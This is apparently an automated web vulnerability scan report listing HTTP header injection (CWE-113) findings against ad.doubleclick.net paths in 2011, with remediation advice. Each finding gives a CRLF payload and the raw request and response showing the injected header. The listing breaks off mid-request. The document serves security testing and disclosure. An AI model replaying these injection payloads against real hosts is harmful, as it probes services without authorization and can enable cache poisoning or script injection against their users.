CWE-113, HTTP Header Injection, HTTP Response Splitting, DORK Report

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c9c1%0d%0a579cb4ff136 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c9c1%0d%0a579cb4ff136;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c9c1
579cb4ff136;dc_pixel_url=resn.bfppixel;dc_seg=111918;ord=9544611894525588:
Date: Mon, 14 Feb 2011 01:37:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N2724.UndertoneNetwork/B4504763.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e8e4%0d%0a2fefa587c7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e8e4%0d%0a2fefa587c7c/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356659/Bottom-injection-British-girl-watched-U-S-drugs-agents.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e8e4
2fefa587c7c/N2724.UndertoneNetwork/B4504763.26;sz=160x600;pc=[TPAS_ID];ord=1297647406285:
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3867.ContextWeb/B5127624.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d3d7%0d%0acda025163d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d3d7%0d%0acda025163d8/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d3d7
cda025163d8/N3867.ContextWeb/B5127624.18;sz=1x1;pc=53910;ord=1297647394261:
Date: Mon, 14 Feb 2011 01:40:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N6457.4298.ADVERTISING.COM/B4840137.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ef38%0d%0a0fd2405f6d4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ef38%0d%0a0fd2405f6d4/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2ef38
0fd2405f6d4/N6457.4298.ADVERTISING.COM/B4840137.15;sz=1x1;ord=3034110126:
Date: Mon, 14 Feb 2011 01:40:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49ace%0d%0a79cce659e85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49ace%0d%0a79cce659e85/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;sz=300x250;contx=none;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3461791? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49ace
79cce659e85/cm.dailymail/ron_052010;net=cm;u=,cm-41374895_1297647368,11d765b6a10b1b3,none,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-m:
Date: Mon, 14 Feb 2011 01:38:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.Media6/B3897970.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 547d9%0d%0aaddfa21ea08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /547d9%0d%0aaddfa21ea08/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071663510365101|ec=1|secId=194|price=0.3381000030040741|pubId=562|advId=971|notifyServer=asd147.sd.pl.pvt|spId=27355|adType=iframe|invId=3099|bid=1.61|ctrack=;ord=1297647331695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/547d9
addfa21ea08/N1558.Media6/B3897970.7;sz=300x250;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 01:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2724.Specific_Media/B4323655.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c5f7%0d%0a4e3b8886cbe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c5f7%0d%0a4e3b8886cbe/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=5434%3Bc=123869%3Bb=785306%3Bp=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0%3Bts=20110213203406%3Bdct=;ord=20110213203406? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=123869;b=785306;ts=20110213203406;p=ui%3DuosDj9Liw_xRTA%3Btr%3DGdDAFShDwEH%3Btm%3D0-0;cxt=99002376:2166629-99002135:2165456-99013532:2161575
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c5f7
4e3b8886cbe/N2724.Specific_Media/B4323655.35;sz=300x250;;id=CY;type=d;data=camry;pc=[TPAS_ID];click=http: //ads.specificmedia.com/click/v=5;m=2;l=5434;c=123869;b=785306;p=ui=uosDj9Liw_xRTA;tr=GdDAFShDwEH;tm=0-0;ts=20110213203406;dct=;ord=20110213203406
Date: Mon, 14 Feb 2011 01:34:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.usatoday/B2343920.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15b01%0d%0a972348252b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15b01%0d%0a972348252b4/N3285.usatoday/B2343920.27;sz=728x90;click=http%3A//gannett.gcion.com/adlink%2F5111%2F221898%2F0%2F225%2FAdId%3D1449317%3BBnId%3D1%3Bitime%3D647327658%3Bkey%3DDaniels%2Bat%2BCPAC%2Bcalls%2Bbroad%2Bcivil%2Bconservative%2Bcoalition%2Blaquo%2BDes%2BMoines%2BRegister%2BStaff%2BBlogs%3Blink%3D;ord=647327658? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15b01
972348252b4/N3285.usatoday/B2343920.27;sz=728x90;click=http: //gannett.gcion.com/adlink/5111/221898/0/225/AdId=1449317;BnId=1;itime=647327658;key=Daniels+at+CPAC+calls+broad+civil+conservative+coalition+laquo+Des+Moines+Register+Staff+Blogs;link=;ord=647327658
Date: Mon, 14 Feb 2011 01:36:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5123509.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d6f8%0d%0a603205b847e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d6f8%0d%0a603205b847e/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6f8
603205b847e/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http: //a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66666%0d%0abd96a1a83dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66666%0d%0abd96a1a83dd/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66666
bd96a1a83dd/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 02:17:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1321c%0d%0a3e041b3a832 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1321c%0d%0a3e041b3a832/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1321c
3e041b3a832/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http: //a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418
Date: Mon, 14 Feb 2011 03:01:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72502%0d%0a12671d1359d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72502%0d%0a12671d1359d/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/198323728.198101735/289800150/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/289800150/direct;wi.728;hi.90/01/3134178?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72502
12671d1359d/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971:
Date: Mon, 14 Feb 2011 01:52:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8504a%0d%0adf688c05841 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8504a%0d%0adf688c05841/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670?;ord=669427212? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
